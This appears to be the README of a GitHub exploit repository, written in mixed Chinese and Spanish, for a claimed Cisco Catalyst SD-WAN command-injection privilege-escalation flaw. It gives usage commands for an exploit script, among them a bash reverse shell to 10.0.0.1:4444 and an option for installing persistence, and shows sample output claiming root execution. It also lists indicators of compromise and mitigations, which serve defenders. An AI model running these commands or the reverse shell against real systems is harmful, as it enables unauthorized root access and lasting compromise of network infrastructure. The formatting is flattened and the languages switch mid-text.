fevar54/CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

# CVE-2026-20245 - Cisco SD-WAN 提权漏洞利用 [](https://nvd.nist.gov/vuln/detail/CVE-2026-20245) [](https://nvd.nist.gov/vuln/detail/CVE-2026-20245) [](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) ## ⚠️ 警告 **此代码仅供教育和授权的安全测试目的使用。** ## 📋 描述 CVE-2026-20245 是 Cisco Catalyst SD-WAN Controller (vSmart)、Cisco Catalyst SD-WAN Manager (vManage) 和 Cisco Catalyst SD-WAN Validator (vBond) 的 CLI 中存在的一个**提权**漏洞。拥有 netadmin 权限的已认证攻击者可以通过上传特制文件以 root 身份执行任意命令。 ### 技术细节 | 字段 | 值 | |-------|-------| | **CVE** | CVE-2026-20245 | | **CVSS** | 7.8（高） | | **向量** | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | | **组件** | CLI / CSV 上传 | | **类型** | 命令注入 (CWE-116) | ## 🎯 受影响版本 | 产品 | 易受攻击版本 | |----------|----------------------| | Cisco Catalyst SD-WAN Manager | < 20.18.3.1 | | Cisco Catalyst SD-WAN Controller (vSmart) | < 20.18.3.1 | | Cisco Catalyst SD-WAN Validator (vBond) | < 20.18.3.1 | ### 特定的受影响版本： - 20.9.x（所有版本） - 20.10.x - 20.12.5.3 - 20.12.6 - 20.12.6.1 - 20.12.7 - 20.13.x - 20.15.4.3 - 20.15.5 - 20.15.5.1 - 20.16.x - 20.18.2.1 ## 🔧 安装 ``` # 克隆 repository git clone https://github.com/username/CVE-2026-20245-PoC cd CVE-2026-20245-PoC # 安装 dependencies pip install -r requirements.txt # 授予权限 chmod +x exploit.py 📦 Dependencias txt requests>=2.31.0 🚀 Uso Verificar versión bash python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only Ejecutar comando bash python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id" Reverse shell bash python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" Instalar persistencia bash python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist 🔍 Output esperado text ╔═══════════════════════════════════════════════════════════════════╗ ║ CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit ║ ║ Command Injection via Crafted File Upload ║ ║ CVSS: 7.8 (High) | CISA KEV: 2026-06-09 ║ ╚═══════════════════════════════════════════════════════════════════╝ [*] Authenticating to 192.168.1.1... [+] Authentication successful [+] XSRF Token obtained [*] Attempting to execute: id [*] Trying endpoint: /system/device/upload [*] Uploading malicious file... [+] File uploaded successfully [*] Triggering command injection... [+] Trigger response: 200 [+] Command injection successful via /system/device/upload ============================================================ [✓] EXPLOIT SUCCESSFUL [✓] Command executed as root [!] System is VULNERABLE - Apply Cisco patch immediately ============================================================ 🔍 Indicadores de Compromiso (IOCs) Verificar en logs (/var/log/scripts.log) bash # 搜索可疑活动 grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log # 要搜索的特定 Comandos Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv Archivos sospechosos /home/admin/*.csv (archivos CSV no autorizados) /tmp/*.csv /var/log/scripts.log con entradas inusuales Procesos bash # 搜索不寻常的 root 进程 ps aux | grep -E "bash|sh|nc|ncat|socat" 🛡️ Mitigación Opción 1 - Actualizar a versión fija (RECOMENDADO) Versión Fixed Release 20.18.2.1 y anteriores 20.18.3.1 Opción 2 - Limitar acceso Restringir acceso administrativo a la red de gestión Usar autenticación multifactor Monitorear actividad de CSV upload Opción 3 - Configuración segura text # 如果不需要，禁用 serial numbers 的 upload no feature upload-serial-numbers # 限制 netadmin 权限 admin privilege restrict 📚 Referencias Cisco Security Advisory NVD - CVE-2026-20245 CISA KEV Catalog 📊 Timeline Fecha Evento 2026-05-14 Cisco publica advisory inicial 2026-06-04 CVE publicado oficialmente 2026-06-09 CISA añade a KEV 2026-06-23 Fecha límite CISA para parchear ⚖️ Disclaimer Este software se proporciona "tal cual", sin garantías. El autor no es responsable por el uso indebido. Úselo únicamente en sistemas autorizados. ```

标签：Python, 协议分析, 安全 PoC, 思科 SD-WAN, 无后门, 权限提升, 逆向工具